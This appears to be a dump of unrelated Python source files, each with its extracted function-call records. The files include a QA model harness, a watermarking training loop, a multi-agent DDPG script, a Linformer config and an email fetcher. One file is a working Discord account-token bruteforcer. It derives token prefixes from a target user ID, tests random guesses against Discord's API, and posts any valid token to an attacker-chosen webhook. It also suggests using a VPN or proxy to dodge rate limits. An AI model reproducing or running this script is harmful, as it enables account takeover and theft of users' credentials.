"health_qa.src.utils.chunks_ques_wrapper"
] |
[((364, 391), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (381, 391), False, 'import logging\n'), ((448, 470), 'os.chdir', 'os.chdir', (['project_path'], {}), '(project_path)\n', (456, 470), False, 'import os\n'), ((564, 605), 'yaml.load', 'yaml.load', (['stream'], {'Loader': 'yaml.FullLoader'}), '(stream, Loader=yaml.FullLoader)\n', (573, 605), False, 'import yaml\n'), ((1071, 1137), 'transformers.AutoModelForQuestionAnswering.from_pretrained', 'AutoModelForQuestionAnswering.from_pretrained', (["config['MODEL_DIR']"], {}), "(config['MODEL_DIR'])\n", (1116, 1137), False, 'from transformers import AutoTokenizer, AutoModelForQuestionAnswering\n'), ((1180, 1250), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (["config['MODEL_DIR']"], {'do_lower_case': '(True)'}), "(config['MODEL_DIR'], do_lower_case=True)\n", (1209, 1250), False, 'from transformers import AutoTokenizer, AutoModelForQuestionAnswering\n'), ((2688, 2722), 'torch.max', 'torch.max', (['answer_start_scores', '(-1)'], {}), '(answer_start_scores, -1)\n', (2697, 2722), False, 'import torch\n'), ((2833, 2865), 'torch.max', 'torch.max', (['answer_end_scores', '(-1)'], {}), '(answer_end_scores, -1)\n', (2842, 2865), False, 'import torch\n'), ((3018, 3042), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (3040, 3042), False, 'import torch\n'), ((3667, 3696), 'collections.defaultdict', 'collections.defaultdict', (['dict'], {}), '(dict)\n', (3690, 3696), False, 'import collections\n'), ((4076, 4092), 'time.localtime', 'time.localtime', ([], {}), '()\n', (4090, 4092), False, 'import time\n'), ((4109, 4141), 'time.strftime', 'time.strftime', (['"""%Y%m%d%H%M%S"""', 't'], {}), "('%Y%m%d%H%M%S', t)\n", (4122, 4141), False, 'import time\n'), ((5406, 5423), 'easydict.EasyDict', 'EasyDict', (['context'], {}), '(context)\n', (5414, 5423), False, 'from easydict import EasyDict\n'), ((5515, 5585), 'tqdm.tqdm', 'tqdm', ([], {'total': '(batch_size * loop_count)', 'smoothing': '(0.0)', 'dynamic_ncols': '(True)'}), '(total=batch_size * loop_count, smoothing=0.0, dynamic_ncols=True)\n', (5519, 5585), False, 'from tqdm import tqdm\n'), ((5729, 5752), 'fire.Fire', 'Fire', (['main_test_handler'], {}), '(main_test_handler)\n', (5733, 5752), False, 'from fire import Fire\n'), ((2389, 2404), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2402, 2404), False, 'import torch\n'), ((2536, 2562), 'torch.stack', 'torch.stack', (['answer_scores'], {}), '(answer_scores)\n', (2547, 2562), False, 'import torch\n'), ((953, 978), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (976, 978), False, 'import torch\n'), ((1681, 1708), 'ast.literal_eval', 'ast.literal_eval', (['text_json'], {}), '(text_json)\n', (1697, 1708), False, 'import ast\n'), ((411, 425), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (415, 425), False, 'from pathlib import Path\n'), ((4690, 4738), 'health_qa.src.utils.chunks_ques_wrapper', 'chunks_ques_wrapper', ([], {'all_ques': 'questions', 'size': '(13)'}), '(all_ques=questions, size=13)\n', (4709, 4738), False, 'from health_qa.src.utils import chunks_ques_wrapper\n'), ((5233, 5257), 'json.dumps', 'json.dumps', (['json_context'], {}), '(json_context)\n', (5243, 5257), False, 'import json\n')]
|
import requests
import colorama
import os
from base64 import b64encode as b64
from base64 import b64decode
import base64
from random import choice as ch
import time
from colorama import Fore, Back, Style
from colorama import init
def bruteforce_token():
init()
print(Style.BRIGHT)
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print("NOTE: this bruteforcer does NOT work with MFA tokens, those seem to have a different structure than normal ones.\n\n")
WEBHOOK_URL = input('WebHook URL to send bruteforce results to, if successful: ')
URL = 'https://discordapp.com/api/users/@me'
valid_or_not = None
userid = input('UserID to bruteforce: ')
times = input('Amount of times to bruteforce (int): ')
once = 0
start = str(b64(userid.encode("utf-8"))).replace("'","")[1:]
CHARS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'M', 'N', 'O', 'p', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '_']
CHARS2 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'M', 'N', 'O', 'p', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
try:
f_read = open('ignore.txt', 'r')
tokens_to_ignore = str(f_read.read())
f_read.close
except:
tokens_to_ignore = "lorem ipsum no_match"
while once < int(times):
mid = str(ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2))
end = str(ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS))
token = f"{start}.{mid}.{end}"
if token in tokens_to_ignore:
break
else:
headers = {"Authorization":f"{token}"} # TODO: finish this header thingee
x = requests.get(URL, headers=headers)
if int(x.status_code) == 401:
try:
f = open('ignore.txt', 'a')
f.write(f"\n{token}")
f.close
except:
f = open('ignore.txt', 'w')
f.write(token)
f.close
valid_or_not = "INVALID"
print(f"{Fore.RED}{once+1}) {token} {valid_or_not}")
time.sleep(0.1)
elif int(x.status_code) == 200:
valid_or_not = "VALID"
print(f"{Fore.GREEN}{once+1}) {token} {valid_or_not}")
f = open('valid_token.txt', 'w')
f.write(f'FOUND TOKEN "{token}" FOR USERID "{userid}"')
f.close()
hook_data = {
"content" : f"_ _",
"username" : "Bruteforce Alerts"
}
hook_data["embeds"] = [{"description" : f"The UserID \"{userid}\" has been successfully bruteforced!```TOKEN: \"{token}\"\n\nAMOUNT OF COMBOS TRIED: {once+1}```", "title" : "BRUTEFORCE SUCCESS!" }]
requests.post(WEBHOOK_URL, json = hook_data)
exit()
break
else:
print(f"{Fore.YELLOW}You are being rate limited. The program will now freeze for a minute. If this issue persists, enable a VPN or prefix a proxy url to the \"URL\" variable (variable found on line 27).")
time.sleep(60)
once=once+1
if once >= int(times):
if valid_or_not == "VALID":
valid_count = "1"
else:
valid_count = "0"
print(f"{Fore.CYAN}Out of {once} combinations tested, {valid_count} of them are valid.")
return
|
[
"colorama.init",
"random.choice",
"os.system",
"time.sleep",
"requests.get",
"requests.post"
] |
[((257, 263), 'colorama.init', 'init', ([], {}), '()\n', (261, 263), False, 'from colorama import init\n'), ((312, 328), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (321, 328), False, 'import os\n'), ((341, 359), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (350, 359), False, 'import os\n'), ((2243, 2277), 'requests.get', 'requests.get', (['URL'], {'headers': 'headers'}), '(URL, headers=headers)\n', (2255, 2277), False, 'import requests\n'), ((1713, 1723), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1715, 1723), True, 'from random import choice as ch\n'), ((2051, 2060), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2053, 2060), True, 'from random import choice as ch\n'), ((2608, 2623), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2618, 2623), False, 'import time\n'), ((1700, 1710), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1702, 1710), True, 'from random import choice as ch\n'), ((2039, 2048), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2041, 2048), True, 'from random import choice as ch\n'), ((3190, 3232), 'requests.post', 'requests.post', (['WEBHOOK_URL'], {'json': 'hook_data'}), '(WEBHOOK_URL, json=hook_data)\n', (3203, 3232), False, 'import requests\n'), ((3497, 3511), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (3507, 3511), False, 'import time\n'), ((1687, 1697), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1689, 1697), True, 'from random import choice as ch\n'), ((2027, 2036), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2029, 2036), True, 'from random import choice as ch\n'), ((1674, 1684), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1676, 1684), True, 'from random import choice as ch\n'), ((2015, 2024), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2017, 2024), True, 'from random import choice as ch\n'), ((1648, 1658), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1650, 1658), True, 'from random import choice as ch\n'), ((1661, 1671), 'random.choice', 'ch', (['CHARS2'], {}), '(CHARS2)\n', (1663, 1671), True, 'from random import choice as ch\n'), ((2003, 2012), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (2005, 2012), True, 'from random import choice as ch\n'), ((1991, 2000), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1993, 2000), True, 'from random import choice as ch\n'), ((1979, 1988), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1981, 1988), True, 'from random import choice as ch\n'), ((1967, 1976), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1969, 1976), True, 'from random import choice as ch\n'), ((1955, 1964), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1957, 1964), True, 'from random import choice as ch\n'), ((1943, 1952), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1945, 1952), True, 'from random import choice as ch\n'), ((1931, 1940), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1933, 1940), True, 'from random import choice as ch\n'), ((1919, 1928), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1921, 1928), True, 'from random import choice as ch\n'), ((1907, 1916), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1909, 1916), True, 'from random import choice as ch\n'), ((1895, 1904), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1897, 1904), True, 'from random import choice as ch\n'), ((1883, 1892), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1885, 1892), True, 'from random import choice as ch\n'), ((1871, 1880), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1873, 1880), True, 'from random import choice as ch\n'), ((1859, 1868), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1861, 1868), True, 'from random import choice as ch\n'), ((1847, 1856), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1849, 1856), True, 'from random import choice as ch\n'), ((1835, 1844), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1837, 1844), True, 'from random import choice as ch\n'), ((1823, 1832), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1825, 1832), True, 'from random import choice as ch\n'), ((1811, 1820), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1813, 1820), True, 'from random import choice as ch\n'), ((1799, 1808), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1801, 1808), True, 'from random import choice as ch\n'), ((1787, 1796), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1789, 1796), True, 'from random import choice as ch\n'), ((1775, 1784), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1777, 1784), True, 'from random import choice as ch\n'), ((1763, 1772), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1765, 1772), True, 'from random import choice as ch\n'), ((1739, 1748), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1741, 1748), True, 'from random import choice as ch\n'), ((1751, 1760), 'random.choice', 'ch', (['CHARS'], {}), '(CHARS)\n', (1753, 1760), True, 'from random import choice as ch\n')]
|
#import cv2
import numpy as np
#import os
#import tensorflow as tf
#from tensorflow import keras
def calib_input(iter):
X = np.load("features.npy") / 255.0
images = X[:100]
return {"conv2d_input": images}
|
[
"numpy.load"
] |
[((127, 150), 'numpy.load', 'np.load', (['"""features.npy"""'], {}), "('features.npy')\n", (134, 150), True, 'import numpy as np\n')]
|
import os
import time
import torch
import numpy as np
import utils
import logging
from options import *
from model.hidden import Hidden
from average_meter import AverageMeter
def train(model: Hidden,
device: torch.device,
hidden_config: HiDDenConfiguration,
train_options: TrainingOptions,
this_run_folder: str,
tb_logger):
"""
Trains the HiDDeN model
:param model: The model
:param device: torch.device object, usually this is GPU (if avaliable), otherwise CPU.
:param hidden_config: The network configuration
:param train_options: The training settings
:param this_run_folder: The parent folder for the current training run to store training artifacts/results/logs.
:param tb_logger: TensorBoardLogger object which is a thin wrapper for TensorboardX logger.
Pass None to disable TensorboardX logging
:return:
"""
train_data, val_data = utils.get_data_loaders(hidden_config, train_options)
file_count = len(train_data.dataset)
if file_count % train_options.batch_size == 0:
steps_in_epoch = file_count // train_options.batch_size
else:
steps_in_epoch = file_count // train_options.batch_size + 1
print_each = 10
images_to_save = 8
saved_images_size = (512, 512)
for epoch in range(train_options.start_epoch, train_options.number_of_epochs + 1):
logging.info('\nStarting epoch {}/{}'.format(epoch, train_options.number_of_epochs))
logging.info('Batch size = {}\nSteps in epoch = {}'.format(train_options.batch_size, steps_in_epoch))
losses_accu = {}
epoch_start = time.time()
step = 1
for image, _ in train_data:
image = image.to(device)
message = torch.Tensor(np.random.choice([0, 1], (image.shape[0], hidden_config.message_length))).to(device)
losses, _ = model.train_on_batch([image, message])
if not losses_accu: # dict is empty, initialize
for name in losses:
# losses_accu[name] = []
losses_accu[name] = AverageMeter()
for name, loss in losses.items():
losses_accu[name].update(loss)
if step % print_each == 0 or step == steps_in_epoch:
logging.info(
'Epoch: {}/{} Step: {}/{}'.format(epoch, train_options.number_of_epochs, step, steps_in_epoch))
utils.log_progress(losses_accu)
logging.info('-' * 40)
step += 1
train_duration = time.time() - epoch_start
logging.info('Epoch {} training duration {:.2f} sec'.format(epoch, train_duration))
logging.info('-' * 40)
utils.write_losses(os.path.join(this_run_folder, 'train.csv'), losses_accu, epoch, train_duration)
if tb_logger is not None:
tb_logger.save_losses(losses_accu, epoch)
tb_logger.save_grads(epoch)
tb_logger.save_tensors(epoch)
first_iteration = True
logging.info('Running validation for epoch {}/{}'.format(epoch, train_options.number_of_epochs))
for image, _ in val_data:
image = image.to(device)
message = torch.Tensor(np.random.choice([0, 1], (image.shape[0], hidden_config.message_length))).to(device)
losses, (encoded_images, noised_images, decoded_messages) = model.validate_on_batch([image, message])
if not losses_accu: # dict is empty, initialize
for name in losses:
losses_accu[name] = AverageMeter()
for name, loss in losses.items():
losses_accu[name].update(loss)
if first_iteration:
if hidden_config.enable_fp16:
image = image.float()
encoded_images = encoded_images.float()
utils.save_images(image.cpu()[:images_to_save, :, :, :],
encoded_images[:images_to_save, :, :, :].cpu(),
epoch,
os.path.join(this_run_folder, 'images'), resize_to=saved_images_size)
first_iteration = False
utils.log_progress(losses_accu)
logging.info('-' * 40)
utils.save_checkpoint(model, train_options.experiment_name, epoch, os.path.join(this_run_folder, 'checkpoints'))
utils.write_losses(os.path.join(this_run_folder, 'validation.csv'), losses_accu, epoch,
time.time() - epoch_start)
# if epoch % 10 == 0:
# sleep_sec = 5 * 60
# logging.info(f'\nSleeping for {sleep_sec} seconds to cool down the GPU\n')
# time.sleep(sleep_sec)
|
[
"utils.get_data_loaders",
"average_meter.AverageMeter",
"time.time",
"logging.info",
"numpy.random.choice",
"os.path.join",
"utils.log_progress"
] |
[((952, 1004), 'utils.get_data_loaders', 'utils.get_data_loaders', (['hidden_config', 'train_options'], {}), '(hidden_config, train_options)\n', (974, 1004), False, 'import utils\n'), ((1656, 1667), 'time.time', 'time.time', ([], {}), '()\n', (1665, 1667), False, 'import time\n'), ((2704, 2726), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (2716, 2726), False, 'import logging\n'), ((4221, 4252), 'utils.log_progress', 'utils.log_progress', (['losses_accu'], {}), '(losses_accu)\n', (4239, 4252), False, 'import utils\n'), ((4261, 4283), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (4273, 4283), False, 'import logging\n'), ((2578, 2589), 'time.time', 'time.time', ([], {}), '()\n', (2587, 2589), False, 'import time\n'), ((2754, 2796), 'os.path.join', 'os.path.join', (['this_run_folder', '"""train.csv"""'], {}), "(this_run_folder, 'train.csv')\n", (2766, 2796), False, 'import os\n'), ((4359, 4403), 'os.path.join', 'os.path.join', (['this_run_folder', '"""checkpoints"""'], {}), "(this_run_folder, 'checkpoints')\n", (4371, 4403), False, 'import os\n'), ((4432, 4479), 'os.path.join', 'os.path.join', (['this_run_folder', '"""validation.csv"""'], {}), "(this_run_folder, 'validation.csv')\n", (4444, 4479), False, 'import os\n'), ((2459, 2490), 'utils.log_progress', 'utils.log_progress', (['losses_accu'], {}), '(losses_accu)\n', (2477, 2490), False, 'import utils\n'), ((2507, 2529), 'logging.info', 'logging.info', (["('-' * 40)"], {}), "('-' * 40)\n", (2519, 2529), False, 'import logging\n'), ((4528, 4539), 'time.time', 'time.time', ([], {}), '()\n', (4537, 4539), False, 'import time\n'), ((2123, 2137), 'average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (2135, 2137), False, 'from average_meter import AverageMeter\n'), ((3584, 3598), 'average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (3596, 3598), False, 'from average_meter import AverageMeter\n'), ((4102, 4141), 'os.path.join', 'os.path.join', (['this_run_folder', '"""images"""'], {}), "(this_run_folder, 'images')\n", (4114, 4141), False, 'import os\n'), ((1793, 1865), 'numpy.random.choice', 'np.random.choice', (['[0, 1]', '(image.shape[0], hidden_config.message_length)'], {}), '([0, 1], (image.shape[0], hidden_config.message_length))\n', (1809, 1865), True, 'import numpy as np\n'), ((3248, 3320), 'numpy.random.choice', 'np.random.choice', (['[0, 1]', '(image.shape[0], hidden_config.message_length)'], {}), '([0, 1], (image.shape[0], hidden_config.message_length))\n', (3264, 3320), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 14 14:28:11 2018
@author: <NAME>
"""
import numpy as np
import numpy.random as rd
import argparse
from collections import deque
import pickle
import os
from ddpg import Actor, Critic
from make_env import make_env
import torch
dtype = torch.float
device = torch.device("cuda")
def ornsteinUhlenbeck(x_prev, mu,
sigma = 0.3, theta = 0.15, dt = 0.01):
mu = np.zeros_like(x_prev)
n = np.size(x_prev)
x = x_prev + theta*(mu - x_prev)*dt + sigma*np.sqrt(dt)*rd.normal(0, 1, n)
return x
def sample(buffer, N):
if len(buffer) <= N:
return buffer
else:
idx = rd.choice(len(buffer), N, replace = False)
sample = []
for i in range(N):
sample.append(buffer[idx[i]])
return sample
def episode(n_episodes, buffer_size, N, learn, render, x0, mu, sigma, theta, dt,
alpha, gamma, tau, init_actors = None, init_critics = None):
actors, critics = [], []
for i in range(env.n):
if init_actors is not None:
actors = init_actors
critics = init_critics
else:
actors.append(Actor(env.observation_space[i].shape[0], env.action_space[i].n))
critics.append(Critic(env.observation_space[i].shape[0], env.action_space[i].n, actors[i]))
replay_buffer = deque()
evolution = []
for ep in range(n_episodes):
noise = x0
state = env.reset()
ep_rewards = np.zeros(env.n)
step_count = 0
done = np.array([False] * 4)
while (not any(done) and step_count < 1000):
if render:
env.render()
###Choose an action and go to next state
actions = []
for i in range(env.n):
noise = ornsteinUhlenbeck(noise, mu, sigma, theta, dt)
action = actors[i].forwardPass(state[i]).detach().numpy()
actions.append(np.clip(action + noise, -2, 2))
next_state, rewards, done, _ = env.step(actions)
rewards = np.asarray(rewards) - 500*np.asarray(done)
ep_rewards += rewards
if learn:
###Store in the replay buffer
replay_buffer.append(np.array([state, actions, rewards, next_state]))
if len(replay_buffer)>buffer_size:
replay_buffer.popleft()
###Sample a minibatch from the buffer
minibatch = sample(replay_buffer, N)
###Learn from this minibatch
for i in range(env.n):
critics[i].learn(minibatch, i)
actors[i].learn(minibatch, i)
###Prepare for next step
step_count +=1
state = next_state
ep_rewards /= step_count
print("Episode " + str(ep) + " : " + str(ep_rewards) + " in " + str(step_count) + " steps")
evolution.append((ep_rewards, step_count))
return actors, critics, evolution
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--env', default='simple_tag_guided', type=str)
parser.add_argument('--n_episodes', default=5000, type=int)
parser.add_argument ('--learn', default=True, type=bool)
parser.add_argument ('--render', default=False, type=bool)
parser.add_argument ('--buffer_size', default=1000, type=int)
parser.add_argument ('--minibatch_size', default=32, type=int)
parser.add_argument ('--alpha', default=0.001, type=float)
parser.add_argument ('--gamma', default=0.9, type=float)
parser.add_argument ('--tau', default=0.01, type=float)
parser.add_argument ('--ou_x0', default=0, type=float)
parser.add_argument ('--ou_mu', default=0, type=float)
parser.add_argument ('--ou_sigma', default=0.3, type=float)
parser.add_argument ('--ou_theta', default=0.15, type=float)
parser.add_argument ('--ou_dt', default=0.01, type=float)
args = parser.parse_args()
env = make_env(args.env)
actors, critics, evolution = episode(n_episodes = args.n_episodes,
buffer_size = args.buffer_size,
N = args.minibatch_size, learn = args.learn, render = args.render,
x0 = args.ou_x0 * np.ones(env.action_space[0].n),
mu = args.ou_mu * np.ones(env.action_space[0].n),
sigma = args.ou_sigma, theta = args.ou_theta, dt = args.ou_dt,
alpha = args.alpha, gamma = args.gamma, tau = args.tau)
pickle.dump(actors, open('actors','wb'))
pickle.dump(critics, open('critics','wb'))
pickle.dump(evolution, open('evolution','wb'))
print(os.getcwd())
|
[
"numpy.size",
"numpy.zeros_like",
"make_env.make_env",
"argparse.ArgumentParser",
"os.getcwd",
"numpy.asarray",
"numpy.zeros",
"numpy.ones",
"numpy.clip",
"numpy.array",
"numpy.random.normal",
"torch.device",
"ddpg.Critic",
"ddpg.Actor",
"collections.deque",
"numpy.sqrt"
] |
[((307, 327), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (319, 327), False, 'import torch\n'), ((443, 464), 'numpy.zeros_like', 'np.zeros_like', (['x_prev'], {}), '(x_prev)\n', (456, 464), True, 'import numpy as np\n'), ((477, 492), 'numpy.size', 'np.size', (['x_prev'], {}), '(x_prev)\n', (484, 492), True, 'import numpy as np\n'), ((1429, 1436), 'collections.deque', 'deque', ([], {}), '()\n', (1434, 1436), False, 'from collections import deque\n'), ((3270, 3295), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3293, 3295), False, 'import argparse\n'), ((4229, 4247), 'make_env.make_env', 'make_env', (['args.env'], {}), '(args.env)\n', (4237, 4247), False, 'from make_env import make_env\n'), ((1589, 1604), 'numpy.zeros', 'np.zeros', (['env.n'], {}), '(env.n)\n', (1597, 1604), True, 'import numpy as np\n'), ((1643, 1664), 'numpy.array', 'np.array', (['([False] * 4)'], {}), '([False] * 4)\n', (1651, 1664), True, 'import numpy as np\n'), ((4909, 4920), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4918, 4920), False, 'import os\n'), ((557, 575), 'numpy.random.normal', 'rd.normal', (['(0)', '(1)', 'n'], {}), '(0, 1, n)\n', (566, 575), True, 'import numpy.random as rd\n'), ((545, 556), 'numpy.sqrt', 'np.sqrt', (['dt'], {}), '(dt)\n', (552, 556), True, 'import numpy as np\n'), ((1235, 1298), 'ddpg.Actor', 'Actor', (['env.observation_space[i].shape[0]', 'env.action_space[i].n'], {}), '(env.observation_space[i].shape[0], env.action_space[i].n)\n', (1240, 1298), False, 'from ddpg import Actor, Critic\n'), ((1327, 1402), 'ddpg.Critic', 'Critic', (['env.observation_space[i].shape[0]', 'env.action_space[i].n', 'actors[i]'], {}), '(env.observation_space[i].shape[0], env.action_space[i].n, actors[i])\n', (1333, 1402), False, 'from ddpg import Actor, Critic\n'), ((2196, 2215), 'numpy.asarray', 'np.asarray', (['rewards'], {}), '(rewards)\n', (2206, 2215), True, 'import numpy as np\n'), ((4514, 4544), 'numpy.ones', 'np.ones', (['env.action_space[0].n'], {}), '(env.action_space[0].n)\n', (4521, 4544), True, 'import numpy as np\n'), ((4576, 4606), 'numpy.ones', 'np.ones', (['env.action_space[0].n'], {}), '(env.action_space[0].n)\n', (4583, 4606), True, 'import numpy as np\n'), ((2081, 2111), 'numpy.clip', 'np.clip', (['(action + noise)', '(-2)', '(2)'], {}), '(action + noise, -2, 2)\n', (2088, 2111), True, 'import numpy as np\n'), ((2222, 2238), 'numpy.asarray', 'np.asarray', (['done'], {}), '(done)\n', (2232, 2238), True, 'import numpy as np\n'), ((2391, 2438), 'numpy.array', 'np.array', (['[state, actions, rewards, next_state]'], {}), '([state, actions, rewards, next_state])\n', (2399, 2438), True, 'import numpy as np\n')]
|
# coding=utf_8
# Copyright 2020 The Allen Institute for AI team and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE_2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Linformer configuration """
import logging
from typing import List, Union
from .configuration_roberta import RobertaConfig
logger = logging.getLogger(__name__)
LINFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {}
class LinformerConfig(RobertaConfig):
model_type = "linformer"
def __init__(
self,
max_seq_len: int = 512,
compressed: int = 1,
shared_kv_compressed: bool = False,
shared_layer_kv_compressed: bool = False,
freeze_compress: bool = False,
**kwargs,
):
"""
max_seq_len: maximum sequence length to compress from
(different from max position embeds for fairseq models)
compressed: compressed ratio of sequence length
(TODO should this be a float??)
shared_kv_compressed: share compressed matrix between k and v, in each layer
shared_layer_kv_compressed: share compressed matrix between k and v and across all layers
freeze_compress: freeze the parameters in compressed layer
"""
super().__init__(**kwargs)
self.max_seq_len = max_seq_len
self.compressed = compressed
self.shared_kv_compressed = shared_kv_compressed
self.shared_layer_kv_compressed = shared_layer_kv_compressed
self.freeze_compress = freeze_compress
|
[
"logging.getLogger"
] |
[((781, 808), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (798, 808), False, 'import logging\n')]
|
import imaplib
import json
import os
import tqdm
class Mail:
def __init__(self, username, password, host='imap.gmail.com', port=993):
self.conn = imaplib.IMAP4_SSL(host, port)
self.conn.login(username, password)
def select_mailbox(self, mailbox='INBOX'):
self.conn.select(mailbox)
def get_emails_nums(self, subject='Daily Coding Problem: Problem', new=True, date_begin=None, date_end=None):
args = []
if subject:
args.append(f'SUBJECT "{subject}"')
if new:
args.append(f'UNSEEN')
if date_begin:
args.append(f'SINCE "{date_begin}"')
if date_end:
args.append(f'BEFORE "{date_end}"')
typ, msgnums = self.conn.search(None, *args)
msgnums = msgnums[0].split()
if typ == 'OK':
print(f'Got {len(msgnums)} messages ID')
return typ, msgnums
else:
print('[WARNING] Something went wrong when searching for e-mails: typ={typ}')
return typ, msgnums
def get_emails(self, nums, msg_parts='BODY[TEXT]'):
nums = tuple(nums)
if not isinstance(nums[0], bytes):
raise TypeError('numbers should be a list of byte-strings')
for num in tqdm.tqdm(nums):
subject = self.conn.fetch(num,
"BODY[HEADER]")[1][0][1].decode().split('\r\n')[64].split()
problem_id = subject[-2]
problem_diff = subject[-1]
data = self.conn.fetch(num,
"BODY[TEXT]")[1][0][1].decode().split('\r\n')
problem = ''
for line in data[6:]:
if line[:3] != '---':
line = line.replace('=', '')
problem += line + '\n'
else:
break
recruiter = data[6]
self._create_folder(id=problem_id, difficulty=problem_diff,
problem=problem, recruiter=recruiter)
return 0
@staticmethod
def _create_folder(**params):
try:
folder_name = f'{params["difficulty"]} Problem {params["id"]}'
os.mkdir(folder_name)
os.chdir(folder_name)
os.system(f'touch main.py')
with open('infos.txt', 'w') as fp:
fp.write(params['problem'])
fp.write(params['recruiter'])
os.chdir('../')
except KeyError as e:
print(f'A parameter is missing: {e}')
return 1
except Exception as e:
print(f'An unexpeted error occured: {e}')
return 1
def get_data(file_name='infos.json'):
try:
with open(file_name) as fp:
data = json.load(fp)
username = data['username']
password = data['password']
return username, password
except FileNotFoundError as e:
print(f'Input file "{e.filename}" was not found in current directory: {os.getcwd()}')
return 1
except PermissionError as e:
print(f'Permission denied to read file "{file_name}"')
return 1
except json.JSONDecodeError as e:
print(f'There was an error at ({e.lineno}, {e.colno}) while decoding the file "{file_name}"')
return 1
if __name__ == '__main__':
data = get_data()
os.chdir('Problems')
mail = Mail(*data)
mail.select_mailbox()
_, nums = mail.get_emails_nums()
mail.get_emails(nums)
|
[
"imaplib.IMAP4_SSL",
"tqdm.tqdm",
"os.mkdir",
"json.load",
"os.getcwd",
"os.system",
"os.chdir"
] |
